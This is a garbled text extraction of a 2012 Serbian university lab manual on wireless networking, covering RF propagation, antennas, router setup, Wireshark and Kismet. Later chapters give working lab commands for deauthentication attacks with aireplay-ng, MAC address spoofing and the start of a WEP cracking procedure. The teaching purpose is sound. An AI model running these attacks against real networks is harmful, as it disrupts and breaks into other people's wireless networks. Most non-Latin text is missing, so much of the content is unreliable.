Professional Documents
Culture Documents
Bks Prirucnik1 PDF
Bks Prirucnik1 PDF
, 2012.
: , ,
,
: ,
: , ,
,
: 55
CIP
,
:
/
. . . [ .] . - :
, 2012 ( : ) . - 161
. : . ; 29 cm
55. - : . 160.
ISBN 978-86-7982-142-3
1. , , 1952- []
) -
COBISS.SR-ID 194074636
.
11 , .
, 2012.
1. ......................................................................... 2
1.1 ..................................................................................................................... 2
1.2 ............................................................................. 3
........................................................................................................................... 3
........................................................................................................................ 4
.......................................................................................................................... 5
........................................................................................................................ 6
....................................................................................................................... 6
......................................................................................................................... 7
....................................................................................... 8
.......................................................................................................... 9
1.3 .......................................................................................................................... 10
1.4 ...................................................................................................................................... 11
............................................................................................................................ 15
................................................................................................. 19
1.5 .................................................................................................................................... 21
1.6 .............................................................................................................................. 23
1.7 ............................................................................................................. 24
1.8 ............................................... 26
: .............................................................................................. 28
1: .................................................................... 28
2.
......................................................................................................... 30
2.1 ................................................................................................................... 30
2.2 - .................................................................... 31
......................................................................................... 31
................................................................................................................... 33
.................................................................................................. 35
- ................................................. 36
...................................................................................................................... 37
- ............................................................... 38
........................................................................ 39
2.3 - .......................................................... 41
1: - ............................................................. 43
2: - ................................................. 44
3.
..................................................................................................................................... 46
3.1 ....................................................... 46
3.2 ........................................................................................................ 47
3.3 LINUX ........................ 47
3.4 ........................................................... 48
3.5 ............................................................................................................................ 49
...................................................................................................................... 49
.................................................................................................................... 50
3.6 ................................................................................................... 50
3.7 . .................................................................................. 54
3.8 .......................................................................................................... 55
4. ................................................................... 58
4.1 .......................................................................................................................................... 58
4.2 .................................................................................... 58
4.3 .............................................................................................. 59
4.4 .................................................................................. 60
4.5 ...................................................................................... 61
4.6 .................................................................................................. 62
4.7 ............................................................................ 63
4.8 MAC ...................................................................... 66
5. ........................................................ 70
5.1 .............................................................................. 70
5.2 BACKTRACK................................................................................................................................ 70
1: BckTrack ................................................. 70
2: ............................................................. 70
3: Linux ................ 71
5.3 ............................................................... 71
4: ............ 72
5.4 KISMET ..................................................................... 73
5: Kismet ............................................................................. 74
6: Kismet ............................................... 80
5.5 WIRESHARK .................. 80
5.6 .................. 80
5.7 MAC .................................................. 81
5.8 ................................................................... 81
5.9 ................................................................................................. 82
5.10 .................................................................................... 82
7: ......................................................... 83
5.11 IEEE 802.11 ........................................................................................ 84
6. ................................. 88
6.1 .......................................................................................................................................... 88
6.2 DOS (DENIAL-OF-SERVICE) .................................... 89
DoS ................................................................. 90
1: ............................. 91
2: ....................................................... 92
................................................................................ 93
3: ................................................... 95
6.3 ................................................................................ 95
4: .................................. 96
6.4 MAC ....................................................................................... 96
5: ..................................................... 97
7. WEP .............................................. 100
7.1 ........................................................................................................................................ 100
7.2 WEP ........................................................................................................... 100
7.3 ............................................................................................................ 101
7.4 WEP ............................................................................................. 103
7.5 WEP ...................................................................................................................... 105
ARP ........................................................................................... 106
1: 64- WEP ................................................................ 108
2: 128- WEP .............................................................. 109
8. WPA/WPA2 .................................. 112
8.1 ........................................................................................................................................ 112
8.2 WPA/WPA2 ........................................................................................................ 112
WPA-PSK WPA2-PSK ............................................................................................................. 112
8.3 WPA-PSK WPA2-PSK........................................................................................ 114
.................................................................................................................... 115
1: WPA ................................................................................... 117
8.4 WPA-PSK/WPA2-PSK ............... 117
9. ................................................................... 122
9.1 ........................................................................................................................................ 122
9.2 .................................................................................. 122
9.3 ....................................................... 123
1: ............................................. 125
2: ............. 125
10. ............ 128
10.1 ................................................................................................................................... 128
10.2 WPA/WPA2-ENTERPRISE .............................................................................. 131
........................... 131
.................................. 135
RADIUS ................................................................................................. 139
................................................................................ 143
.............................................................................................................. 144
1: WPA2-Enterprise ................................. 148
11. MIKROTIK ROUTERS ............................................. 150
11.1 MIKROTIK ROUTEROS .......................................................................................................... 150
11.2 MIKROTIK ...................................................................................... 150
11.3 MIKROTIK ......................................... 152
1: MikroTik .................................................................................... 159
..................................................................................................................................... 160
................................................................................................. 161
I
.
, , .
.
I
1.
1.1
.
,
,
.
.
1,
.
:
=
:
f ,
c ,
.
GSM 900MHz, 33cm.
, 2,4GHz,
12,5cm. , ,
.
, ,
:
, .
, .
, .
,
. FM .
88MHz 108MHz,
.
5m, 5mm,
. , 50m (
) .
.
1 ,
, ,
.
,
. ( ),
(
). , FM (88MHz -108 MHz)
, ( GSM 900MHz
1800MHz) . FM
GSM-, GSM .
( )
( , )
, (. QPSK, 8PSK).
1.2
,
. .
1.1 : ) )
.
( ) , 1.1,
(1 + 1 = 2).
2. ,
, 1.1,
(1 + (-1) = 0). 3.
,
RF4 ( ).
.
2Constructive interference
3Destructiveinterference
4 Radio Frequency
3
I
, ,
.
, .
.
, .
.
.
.
:
.
.
.
.
(
).
: ,
, , . -,
.
-.
- .
.
.
. ,
.
2,4GHz,
(
2,4GHz). -
.
- . o
.
. -
, .
- ( ) 5
. -
.
1.2 : ()
. ,
, .
, , ,
.
( 1.3) .
( 1.3) --
- .
1.3 : ) - )
5Reflection
5
I
()
6( ).
.
1.4 :
,
, .
:
. , , ,
( 1.5). ,
.
( )
. ( 1.6).
6Shadowing
1.5 :
.
, .
.
1.6 :
, ,
(7) . (
1.7). , , 10cm 20cm,
(, ,
...) .
7Scattering
7
I
1.7 :
,
:
, ,
.
,
. 1.8
8 (
).
.
1.8 :
.
, 1.9.
1.9 :
,
.
.
.
. (
)
, ,
.
,
n/2, n .
60%
.
:
:
rn n-
d1
d2
10km, 2,4GHz.
17,66m. 28GHz,
5,17m. 60%
,
10,59m
.
6,36m.
1.10
. (
),
. 9 (
) .
, .
9ulti-path propagation
9
I
. ,
,
.
10. GSM 16us
( ),
5km .
1.10 :
.
, ,
.
, .
, .
.
1.10
. .
, , e
.
. 20%
.
-
. ,
.
1.3
,
.
.
10Delay spread
10
(dB).
. , ,
, , .
= 10 [ ]
N , P1 , P2
( ).
, (P2) 1W, (P1)
0.5W, 3dB. , :
0,5
10 = 3,01
1
.
3dB 50%
. , 3dB 100%
.
1.1 P1/P2:
3dB 2
10dB 10
20dB 100
30dB 1.000
40dB 10.000
50dB 100.000
60dB 1.000.000
1.1 : dB
,
, . 1mW. dBm,
:
= 10
1
.
1.4
, .
.
, .
.
11
I
, :
, , , .
.
.
.
. ,
.
, dBi.
,
dBd. :
0dBd = 2,15dBi.
.
(elevation, E-plane) (azimut, H-palne) .
,
.
1.11 .
1.11 :
,
() ,
. , ()
.
(). ,
.
.
. 1.12 .
12
1.12 : Yagi
. (. )
.
Marconi .
1.11 Yagi
.
. .
: ( 1.13), ( 1.13)
( 1.14).
.
.
.
13
I
1.13 : ) )
.
.
1.14 :
, .
.
.
14
.
1.2
.
, .
.
(. ).
-
0dB
20dB
3 dB
(45) 3 dB
20 dB
0 dB
3 dB
(45) 3 dB
( ) ( ) 20 dB
( ) ( ) 0 dB
( ) ( ) 0dB
1.2 : -
.
,
, , .
.
.
: () , , Yagi
.
2,2 dBi .
.
.
, 1.15.
15
I
1.15 : -
, 360
.
, , ,
.
,
.
Cisco AIR-ANT2485P-R 8,5dBi.
.
, 1.16.
1.16 :
1.17
.
16
1.17 : AIR-ANT2485P-R
.
AIR-ANT2485P-R 1.3.
8.5dBi
H-plane 66
E-plane 56
RP-TNC
1.3 : AIR-ANT2485P-R
Yagi .
Yagi-Uda, .
1.18.
.
17
I
1.18 : Yagi
1.19 : AIR-ANT1949
AIR-ANT1949 1.4.
13.5dBi
H-plane 30
E-plane 25
RP-TNC
/
1.4 : AIR-ANT1949
18
( 1.20) 100
. -
, . Cisco AIR-ANT3338
40km 2Mb/s.
54Mb/s 8km.
1.20 :
21dBi
H-plane 12
E-plane 12
RP-TNC
1.5 :
, ,
. ,
. .
( 1.21) .
19
I
1.21 :
20m,
18,
:
126m .
( 1.22).
20
1.22 :
=
( + )
15.
15 45m.
1.5
HF
(3MHz 30MHz). (), (),
( 1.23)
1.23 :
21
I
.
( ).
. . ,
() .
, .
11. , ,
(dB/m).
.
, . , ,
. ,
,
. :
. .
,
.
, .
.
. (30MHz
300MHz). .
RG58.
, CB12 ( , . -) VHF .
RG213. CB HF . RG-213
.
Heliax ( Foam) ,
. Heliax ( 1.24) ,
LMR . LMR400 ( 1.24) LMR600
Heliax .
11Skin effect
12Citizens' Bandradio
22
,
.
1.6
, ,
. (
), , .
.
( ),
.
, .
1.25.
1.25 :
()
. . ,
(TransverseMagnetic), ,
. , (TransverseElectric),
,
. . 10, 11, .
, , .
( ). /2
. , Y ,
.
.
() ().
( )
, .
.
23
I
1.26 :
1.7
, , .
,
.
.
.
BNC 40- . BNC Bayonet
Neill Concelman, Paul
P Neillandd Carl Conncelman.
. BNC
( RG58 RG-179 RG-316).
GHz.
,
10Base2 .
1..27 BNC
B .
1 .27 : BNC
24
1.28 : TNC
1.29 : N
1.30 : SMA
25
I
1.31 : SMB
MCX 80- .
SM 30% .
6 GHz. 1.32 MCX
. (. pigtail),
.
1.32 : MCX
1.8
:
(dBm) = (dBm) + (dB) (dB)
: ,
, , ,
, .
,
:
PRX = PTX + GTX - LTX - LFS - LM + GRX - LRX
:
PRX (dBm),
PTX (dBm),
GTX (dBi),
LTX ( , ) (dB),
LFS (dB),
26
LM , , ... (dB),
GRX (dBi),
LRX ( , ) (dB).
:
4
= 20 log
:
L ,
,
d .
:
= 32,45 [dB] + 20 log( [MHz]) + 20 log( [km])
= 27,55 [dB] + 20 log( [MHz]) + 20 log( [m])
= 36,6 [dB] + 20 log( [MHz]) + 20 log( [mile])
.
.
(dB) = (dBm) (dBm)
. 1.6
.
(dB)
(%)
90 8
99 18
99,9 28
99,99 38
99,999 48
1.6 :
, .
.
.
27
I
:
: 5 km
: 5,8 GHz
: -
-: ( 100 mW,
- 88 dBm, 18 dBi, 2
dB)
100mW , 20 dBm.
:
= 32,45 + 20 log(5,8) + 20 log(5) = 121.67 dB
:
PRX = PTX + GTX - LTX - LFS + GRX - LRX
20 dBm + 18 dBi - 2 dB -121,67 dB + 18 dBi - 2 dB
= -69,8 dBm
, 18,2 dB.
99%
, .
1:
50km. MikroTik RBSXTG-5HnD.
. 99%
.
28
II
.
.
RadioMobile -
-.
II
2.
2.1
,
.
-.
-, , -
, .
-,
.
RadioMobile. ,
.
Roger Coud,
13. RadioMobile online
,
.
RadioMobile :
20MHz 20GHz.
Longley-Rice ITS14-.
.
.
( ,
, , , ...).
- ( - ,
, ...).
RadioMobile .
- .
-.
13 http://www.cplus.org/rmw
14 International Telecommunications Society
30
2.2 -
-
- .
:
1. ,
2. ,
3. ,
4. -,
5. -,
6. - ,
7. .
RadioMobile
.
: SRTM15, DTED16, GTOPO3017, ...
(File/Map Properties).
2.1 :
31
II
( ),
. ( 2.1),
40004000 , 20
( 2.2).
2.2 :
Extract
( 2.3).
.
32
2.3 :
.
.
Google Maps, Yahoo Maps
.
Edit/Merge pictures.
Google Maps ( 2.4)
33
II
Operation, ,
. 2.5
Draw. .
2.5 :
34
.
(File/Network properties/Parameters)
( ), - ,
.
802.11g-TT, -
802.11g .
2400MHz 2495MHz ( 2.6).
2.6 :
(File/Network properties/Topology),
(master), (slave)
(). ( 2.7).
35
II
2.7 :
- (File/Network properties/System)
. - .
.
- ,
.
- Kosutnjak-Master,
2.8.
36
2.8 : -
:
: Arena-Klijent
: 100mW
O : -89dBm
: 0,4dB
: Yagi
: 26dBi
: 25m
-.
,
.
(File/Unit properties),
Toranj-Kosutnjak.
( 2.9).
37
II
2.9 :
Arena.
- a, -
e (File/Network properties/Membership). -
Kosutnjak-Master Toranj-Kosutnjak, -
Arena-Klijent Arena ( 2.10).
38
2.10 : -
- ,
(slave). -
2.10 Antenna direction
- a .
,
, - .
(Tools/Radio Link).
2.11.
39
II
2.11 :
.
. -
, .
:
Azimuth -
Elev. angle
Obstruction
Worst Fresnel
Distance
PathLoss dB
E field
RX level
RX Relative
Google Earth (Edit/Export to/Google Earth),
( 2.12).
40
2.3 -
-.
.
- Arena-Klijent
, 26dBi 19dBi
.
(Tools/Radio coverage/Single polar).
( 2.13).
- , -
Arena-Klijent. ( ,
),
-.
.
.
41
II
2.13 :
( Draw), 2.13
- . Yagi ,
.
42
2.14 :
1: -
Radio Mobile - 2.4GHz
. Radio Mobile- .
100km, 4000x4000 .
50m.
.
:
:
TP-Link TA-2448 -
:
TL-WA801ND
0.5dB
?
?
, ?
43
II
2: -
Radio Mobile - 2.4GHz
. Radio Mobile- .
100km, 4000x4000 .
20m.
.
:
:
TP-Link TA-2448 -
TL-ANT2415D -
:
TL-WA801ND
1.5dB
?
?
, ?
44
III
.
.
, .
III
3.
3.1
I 802.11.
- 2,4GHz 5GHz.
, .
, , 1Mb/s
2Mb/s a FHSS (Frequency Hoping Spread Spectrum) DSSS (Direct
Sequence Spread Spectrum).
:
802.11, 54 Mb/s, OFDM
5GHz (5,47GHz - 5,725GHz).
,
.
802.11b, 11 Mb/s, 802.11
2,4GHz , .
DSSS .
802.11g, 54Mb/s, OFDM 2,4GHz
. 802.11b b/g.
802.11n, 600 Mb/s. 2009.
. 802.11n MIMO (multiple-input and
multiple-output) , 2,4GHz, 5GHz,
Channel Bonding-, -
20MHz a 40MHz.
,
, .
,
.
46
3.2
802.11b 802.11g ,
14 22MHz.
. 11 ,
13 . 14. .
.
5MHz. ,
.
5 .
, 1, 6, 11.
3.1 : 2,4Ghz
3.3
Linux
Linux
() . A
(ethx),
( ath0 Atheros ).
MLME (MAC sublayer
management entity) ,
. Linux
API a ,
mac80211, , cfg80211.
. wlanx.
,
:
:
/:
:
iwconfig
:
47
III
?
( IEEE802.11?). ?
?
.
:
iwlist channel
:
?
?
?
,
.
3.4
,
E.
BSS (Basic Service Set) -
.
BSS.
( , ) (Extended Service Set).
(DS).
.
, DS .
(Access Point).
. .
, ,
. . ,
(Managed)
.
,
, .
48
. ,
, ,
,
.
(Indipendent - IBSS) Ad-Hoc .
(Ad-Hoc)
.
( AP, Managed, Ad-Hoc)
() (Monitor, rf-mon).
(. Wireshark,
Kismet).
.
Monitor .
Managed Ad-Hoc, AP
Monitor .
3.5
. , , CSMA/CD
. (CD) .
E .
IEEE 802.11 , , ,
, .
.
IEEE802.11 CSMA/CA (Collision Avoidance).
, .
,
,
CSMA/CA.
(Acknowlgmenet Frame).
, :
RTS CTS .
.
PS-Poll (Power Save Poll). IEEE 802.11
.
.
49
III
CF-End, CF-End+CF-ACK .
, .
DCF (Distributed Coordinated
Function). (Carrier Sence),
, .
DCF,
(Contension Free).
PCF (Point Coordinated Function).
DCF PCF
, CF-End, CF-End+CF-ACK
DCF.
:
Beacon .
Probe request () Probe response () ,
,
.
Authentication Deauthentication
.
Association, Disasociation, Reassociation
.
ATM .
3.6
Wireshark, Monitor .
.
Wireshark, nefiltrirano.cap
, .
,
.
.
:
Statistics Wlan Traffic...
.
SSID (Service Set ID) ,
.
50
, labnet viser,
.
SSID .
BSSID (Basic Service Set ID).
BSSID . BSSID MAC .
Wireshark 24 (OUID- )
).
ESSID (BSSID) Beacon
. .
.
.
Wireless Trafic. (File/Close) nefiltritano.cap.
.
(File/Open) filtrirano.cap
1 2 (Beacon ):
.
(fixed parameters)
(tagged parameters).
.
:
Beacon ad-hoc BSS?
Beacon ?
SSID ?
?
?
(RSN18)?
51
III
52
WEP ,
, . WEP
IEEE80.11-2007.
IEEE802.11i
. (Robust
Security Network - RSN) Beacon Probe Response
(RSN information Tagged parameters).
RSN information Beacon ( 32).
IEEE 802.11i
.
WPA WPA2 (Wireless Protected Access).
IEEE 802.11i, WPA
WPA2, je .
WPA TKIP (Temporal Key Integrity Protocol) .
TKIP WEP,
. WEP -
.
WPA2 (Counter Mode with Cipher Block Chaining Message Authentication Code CCM)
. 802.11
RSN .
o
, IEEE 802.1x .
IEEE 802.1x
EAP19 ,
.
, .
WPA Enterprise WPA2 Enterprise,
.
, , (Pre
Shared Key - PSK). WPA Personal WPA2 Personal,
.
RSN (Robust Security
Network) IEEE802.11i,
WPA2 Enterprise.
802.1x (Request, Identity, Response, Identity).
?
53
III
Ko ?
EAP .
? ( 38)
:
.
EAP-Success . ( 80)
RSN (4-way handshake)
. . ( 82-88)
,
.
. DHCP
.
Wireshark:
, Flow Graph.
3.7 .
Beacon , Probe
(ESSID) ,
(BSS), .
Linux , Network Manager .
, iwlist.
:
iwlist scanning
labnet (ESSID: labnet)
MAC , (BSSID)?
Ad-Hoc ?
- ?
, , ?
?
?
?
54
3.8
,
. dBm, mW
1mW.
:
:
iwlist txpower
?
,
.
.
:
iwlist scanning
wavemon,
.
wavemon.
:
xterm
. xterm :
wavemon
:
.
.
.
. F2
, , /.
F2. .
.
55
IV
.
.
IV
4.
4.1
,
. TP-Link
TP-Link WR841N.
,
, .
SOHO20 .
, ,
.
.
.
IP .
DHCP .
web
.
:
http://192.168.1.1
admin admin
4.2
IP 192.168.1.1, (
) , .
.
, . ,
Network, LAN 4.1.
58
4.1 : IP
4.3
Network, Wan, ,
( ).
4.2 : IP
4.2 .
59
IV
4.4
.
.
4.3 : DHCP
DHCP (
, , DNS ).
(Default Gateway). DHCP Clients List,
, .
,
. ,
. FTP
,
. Address Reservation ,
MAC IP . 4.4
.
60
4.4 :
4.5
Forwarding.
4 , ,
Virtual Servers. 4.5 -
.
4.5 :
61
IV
. , .
, (.
), .
, .
4.5, , IP ,
, . Forwarding,
DMZ (Demilitarized Zone). IP
.
,
, .
. 4.6
.
4.6 : IP
4.6
62
300Mbps.
4.7 :
(SSID), .
4.7
63
IV
4.8 : WEP
WPA-PSK WPA2-PSK ,
.
. WPA2 SOHO
( 4.9):
Version WPA2-PSK.
Encription AES.
PSK Password .
64
4.9 : WPA-PSK/WPA2-PSK
WPA/WPA2
,
. WPA-PSK/WPA2-PSK
, WPA/WPA2 . WPA/WPA2
WPA/WPA2 Enterprise ,
. RADIUS
.
WPA-PSK/WPA2-PSK WPA/WPA2 Enterprise
/, . 4.10
WPA/WPA2 Enterprise .
RADIUS .
65
IV
4.8 MAC
MAC .
( )
( 4.11).
66
4.11 : MAC
4.12 :
:
Transsmit Power - .
Beacon Interval -
.
RTS Treshold RTS/CTS
Fragmentation Treshold .
67
IV
Wireless Statistics
( 4.13).
4.13 :
68
V
Linux -
Back Track, .
Kismet .
Wireshark .
V
5.
5.1
Linux
BackTrack. BackTrack je Ubuntu, Debian
Linux-a. ,
, .
KDE (K Desktop Environment) GNOME
,
. BackTrack
Auditor Security Linux-a WHAX ( Wppix).
21,
BackTrack 5 R3 . BackTrack
, LiveDVD-a
USB .
5.2 BackTrack
1: BckTrack
BckTrack 5 R2 Linux .
2:
:
Start / System / Konsole
:
ifconfig
?
, ,
:
ifconfig -a
?
IP ?
(. wlan0)
:
21 http://www.backtrack-linux.org
70
ifconfig wlan0 up
:
ifconfig wlan0 down
IP . IP
DHCP .
.
DHCP , ,
, IP .
3: Linux
:
Start / System / Konsole
:
dhclient eth0
eth0
DHCP .
DHCP , :
ifconfig eth0
?
:
:
IP - ifconfig < >
<> netmask < >, (. ifconfig eth0 10.0.0.100 netmask 255.0.0.0
- ifconfig eth0 10.0.0.100/8);
route add
default gw < >, (. route add default gw 10.0.0.1);
route, , ;
DNS resolv.conf
/etc ,
Linux (. nano /etc/resolv.conf
nameserver 10.0.0.10); DNS
- cat /etc/resolv.conf.
5.3
71
V
(promiscuous) ,
,
Ad-hoc .
,
.
.
.
Ad-hoc . Windows
, Windows Vista Windows 7
Windows .
Windows . Linux
802.11 .
airmon-ng
. , (Managed)
. :
airmon-ng <start | stop> < > [. ]
airmon-ng <check | check kill>
start | stop ,
;
;
check airmon-ng ;
check kill ;
airmon-ng
.
4:
:
Start / System / Konsole
,
,
:
iwconfig
?
72
(IEEE802.11?). ?
?
:
airmon-ng start wlan0
,
:
iwconfig
mon0 .
:
airmon-ng stop mon0
, .
5.4 Kismet
73
V
5: Kismet
Kismet BackTrack Linux- :
Start / Backtrack / Radio Network Analysis / 80211 / All / Kismet
kismet, Enter.
( 5.1).
5.1 : Kismet
, .
wlan0 [Add],
( 5.2).
5.2 :
74
.
5.3 .
5.3 : Kismet
. autofit
.
Sort ( 5.4).
5.4 :
75
V
.
?
,
.
,
. 5.5 .
5.5 :
.
. Kismet
. kismet_ui.conf ,
decay 3 .
!,
( 3 ), 5.5
HiHaHo;
..
( 6 ), 5.5
energetics;
.
( 6 ),
5.5 rakac.
(SSID) .
Beacon (. SSID-a cloaking SSID),
, <no ssid> .
:
A (Access Point) .
D (Data Network)
.
76
H (Ad-hoc) Ad-hoc .
P (Probe Request) .
Ch :
802.11b/g , 1-13 (1-14 );
802.11 , 36, 40, 44, 48, 52, 56, 60,64, 149, 153, 157
161.
Pkts .
Size .
, Kismet
.
. :
WEP WPA
.
.
.
(SSID).
.
5.6.
Enter i.
77
V
5.6 :
Kismet .
Client list
Windows . 5.7.
5.7 :
/
Channel details Windows .
5.8 .
78
5.8 : /
Kismet .
()
. Configure channel
Kismet ( 5.9)
.
(dwell ).
5.9 :
. .
dump Wireshark.
79
V
6: Kismet
Kismet .
.
?
.
.
viser labnet.
.
?
.
/ .
Wireshark.
5.5 Wireshark
.
Wireshark - (Capture filters)
- (Disply Filters). -
.
. Wireshark
IEEE 802.11 , 802.11
( ).
5.6
(BSSID). BSSID MAC .
,
.
,
.
:
wlan.bssid eq <MAC >
80
5.7 MAC
( MAC 00:09:5b:e8:c4:03):
wlan.sa eq 00:09:5b:e8:c4:03
MAC ipconfig/all getmac ( Windows
), ifconfig ( Linux ).
, :
wlan.bssid eq 00:11:92:6e:cf:00 and wlan.sa eq 00:09:5b:e8:c4:03
5.8
.
type subtype IEEE 802.11 .
Wireshark Beacon ,
Beacon .
10 (PS)-Poll
11 (RTS)
12 (CTS)
13 (ACK)
14 (CF)-End
15 CF-End + CF-Ack
5.1 :
0 -
1 -
2 -
3 -
4 -
5 -
8 Beacon
10
11
12
5.2 :
Beacon (type=00),
8 (subtype=00).
:
!(wlan.fc.type eq 0 and wlan.fc.subtype eq 8)
81
V
()
Beacon .
, Wireshark
type subtype .
Beacon .
:
wlan.fc.type_subtype ne 8
5.3 .
5.9
Beacon
, .
.
:
wlan.fc.type_subtype eq 32
:
wlan.fc.type eq 2
, ICMP (ping), NULL
, ...
5.10
( ).
. IEEE 802.11
protected bit 1,
(WEP,TKIP CCMP).
:
wlan.fc.protected ne 1
.
:
wlan.fc.protected ne 1 and wlan.fc.type eq 2
82
7:
Wireshark .
.
300 .
.
/ :
/
Management frames wlan.fc.type eq 0
Control frames wlan.fc.type eq 1
Data frames wlan.fc.type eq 2
Association request wlan.fc.type_subtype eq 0
Association response wlan.fc.type_subtype eq 1
Reassociation request wlan.fc.type_subtype eq 2
Reassociation response wlan.fc.type_subtype eq 3
Probe request wlan.fc.type_subtype eq 4
Probe response wlan.fc.type_subtype eq 5
Beacon wlan.fc.type_subtype eq 8
Announcement traffic indication map (ATIM) wlan.fc.type_subtype eq 9
Disassociate wlan.fc.type_subtype eq 10
Authentication wlan.fc.type_subtype eq 11
Deauthentication wlan.fc.type_subtype eq 12
Action frames wlan.fc.type_subtype eq 13
Block ACK Request wlan.fc.type_subtype eq 24
Block ACK wlan.fc.type_subtype eq 25
Power-Save Poll wlan.fc.type_subtype eq 26
Request to Send wlan.fc.type_subtype eq 27
Clear to Send wlan.fc.type_subtype eq 28
ACK wlan.fc.type_subtype eq 29
Contention Free Period End wlan.fc.type_subtype eq 30
Contention Free Period End ACK wlan.fc.type_subtype eq 31
Data + Contention Free ACK wlan.fc.type_subtype eq 33
Data + Contention Free Poll wlan.fc.type_subtype eq 34
Data + Contention Free ACK wlan.fc.type_subtype eq 35
+ Contention Free Poll
NULL Data wlan.fc.type_subtype eq 36
NULL Data + Contention Free ACK wlan.fc.type_subtype eq 37
NULL Data + Contention Free Poll wlan.fc.type_subtype eq 38
NULL Data + Contention Free ACK wlan.fc.type_subtype eq 39
+ Contention Free Poll
QoS Data wlan.fc.type_subtype eq 40
QoS Data + Contention Free ACK wlan.fc.type_subtype eq 41
QoS Data + Contention Free Poll wlan.fc.type_subtype eq 42
QoS Data + Contention Free ACK wlan.fc.type_subtype eq 43
+ Contention Free Poll
NULL QoS Data wlan.fc.type_subtype eq 44
83
V
802.11 .
5.4 , Wireshark
.
Type , wlan.fc.type
,
.
Subtype wlan.fc.subtype
.
,
(beacon
frame, authenticate request, disassociate
84
Retry wlan.fc.retry
.
Power wlan.fc.pwrmgmt
Management ,
.
More Data wlan.fc.moredata
()
.
Protected wlan.fc.protected
.
Order wlan.fc.order
.
.
85
V
Duration . wlan.duration
.
.
86
VI
. ,
, .
VI
6.
6.1
. IEEE 802.11 ,
:
.
.
.
.
,
.
.
. -
. ,
.
. , 802.11, "" .
, .
.
, .
:
,
.
(poor configuration) .
. ,
.
(poor encryption).
.
.
,
.
88
DoS ,
.
, DoS .
OSI
. ,
, .
.
,
.
, .
.
.
jamming-to-signal (J/S), ,
.
,
. ,
, .
J/S , ,
:
:
Pj - ,
Pt - ,
Gjr - - ,
Grj - - ,
Grt - - ,
Gtr - - ,
Br - ,
Bj - ,
Rtr - ,
Rjr - ,
Lj - ,
Lr - .
ERP (Effective Radiated Power) ,
, .
89
VI
, ,
, . ,
.
.
,
.
WLAN ,
, , ,
. , WLAN ,
. WLAN
.
. ,
,
. , ,
.
OSI
.
DoS
,
.
. ,
(.
), .
802.11 ,
( ).
DoS .
,
MAC .
, ()
.
, ,
.
DoS :
(cloked SSID);
WPA/WPA2 ;
ARP , WEP . Windows
ARP 22.
22 disconnect
90
,
.
aireplay-ng.
,
(injection)
. aireplay-ng.
1:
.
:
:
Start / System / Konsole
:
airmon-ng start wlan0
:
iwconfig
, :
aireplay-ng
.
,
aireplay-ng -9 mon0
- -9 aireplay-ng ,
- mon0 .
, :
16:29:41 mon0 channel: 9
16:29:41 Trying broadcast probe requests...
16:29:41 Injection is working!
16:29:42 Found 5 APs
,
:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D mon0
:
-0
aireplay-ng ;
1 . 0,
;
-a 00:14:6C:7E:40:80 MAC ;
91
VI
- 00:0F:B5:AE:CE:9D MAC
, ;
mon0 .
:
10:01:45 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80)
on channel 1
10:01:45 Sending 64 directed DeAuth. STMAC:
[00:0F:B5:AE:CE:9D] [ 61|63 ACKs]
aireplay-ng ,
aireplay-ng 128 .
64 . [61 | 63 ACKs],
:
[ ACK | ACK
];
1
, ;
.
,
.
MA ,
, Kismet airodump-ng.
2:
.
:
- SSID spec_lab1 (, spec_lab2, spec_lab3, ...)
- 1 ( 6, 11, ...)
- :
- IP : 172.17.32.100/24
- Default gataway: 172.17.32.1/24
- DNS : 172.16.1.13
1
Manager .
:
airmon-ng stop mon0
:
iwconfig wlan0 essid <SSID>
wlan0 DHCP :
92
dhclient wlan0
.
,
:
ping <IP >
2 .
airodump-ng .
airodump-ng mon0
Wireshark mon0 .
MAC :
aireplay-ng -0 1 -a < > -c <
> mon0
.
?
802.11 ,
SN. SN 12 .
SN .
, 4095.
. 6.11 SN (599, 600, 601 602).
93
VI
6.1 : SN
6.2 45 46.
, (
23 - ). SN
MAC .
44 47, SN 637 638, .
MAC
SN 1957 1958, .
23 Broadcast
94
6.2 :
, .
SN 24.
3:
Wireshark .
6.3
. 25.
(SSID) beacon ,
Probe .
, .
, SSID beacon ,
. ,
, ssocition
95
VI
4:
SSID eacon (
IV ).
SSID .
.
.
Wireshark mon0 .
MAC .
, robe request
.
SSID .
oja SSID ?
6.4 MAC
MAC .
MAC .
MAC 26 je /
. MAC ROM
. , RAM ,
RAM .
96
MAC
RAM , .
. MAC
.
5:
(
IV ).
.
MAC
.
MAC :
ifconfig wlan0 down
:
ifconfig wlan0 hw ether <MAC >
:
ifconfig wlan0 up
:
iwconfig wlan0 essid <SSID >
wlan0 DHCP :
dhclient wlan0
.
?
Windows MAC
, NetworkAddress
( 6.3).
97
98
VII
WEP
.
WEP
.
, .
VII
7. WEP
7.1
.
802.11,
WEP27. , WEP
.
.
IEEE 802.11 WEP
. WEP
,
.
7.2 WEP
. IEEE 802.11 W :
,
.
. ANY SSID
.
hot-spots.
7.1 :
7.1 :
1. .
100
2. .
3. .
WEP .
, 7.2:
1. .
2. 128-
.
3.
.
4. .
5. ,
.
, ,
.
7.2 :
. ,
.
.
7.3
WEP RC4
IV.
101
VII
XOR ( )
:
C = [ M || ICV(M) ] [ RC4(K || IV) ]
:
,
,
ICV(M) ,
,
,
IV - ,
|| - .
7.3 : WEP
102
IV WEP-,
. , 24 , 224
. ,
IV ( ) 99%
12000 . 1 54Mb/s,
12000 .
, 7. 3, IV (
) WEP .
IV .
7.4 WEP
WEP IV
.
Windows WEP
:
1. (Control panel)
.
2. (Properties).
7.4 :
103
VII
3. ( 7.4)
(Add).
4. SSID, WEP (
7.5).
7.5 :
Linux WEP
:
1. .
2. iwconfig ( 7.6).
104
7.6 : iwconfig
3. o WEP
ESSID WEP .
:
dhclient wlan0
7.5 WEP
WEP :
.
.
.
, , . IV-,
, , .
, , .
WEP Aircrack-ng .
aireplay-ng WEP
:
,
ARP ,
KoreK-chopchop ,
,
105
VII
Cafe-latte.
ARP
WEP .
aireplay-ng 29.
ARP
IV
.
. ARP ,
, . ARP
broadcast (FF:FF:FF:FF:FF:FF) 68 . ARP
ARP ,
IV.
:
airodump-ng WEP
,
;
aireplay-ng ARP
;
aircrack-ng IV WEP .
:
:
airmon-ng start wlan0
airodump-ng
WEP :
airodump-ng mon0
29 http://www.aircrack-ng.org/doku.php?id=aireplay-ng
106
7.7 : WEP
, :
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 w snimak mon0
:
-c 9 ,
--bssid 00:14:6C:7E:40:80 ,
w snimak .
aireplay-ng .
aireplay-ng ARP
. :
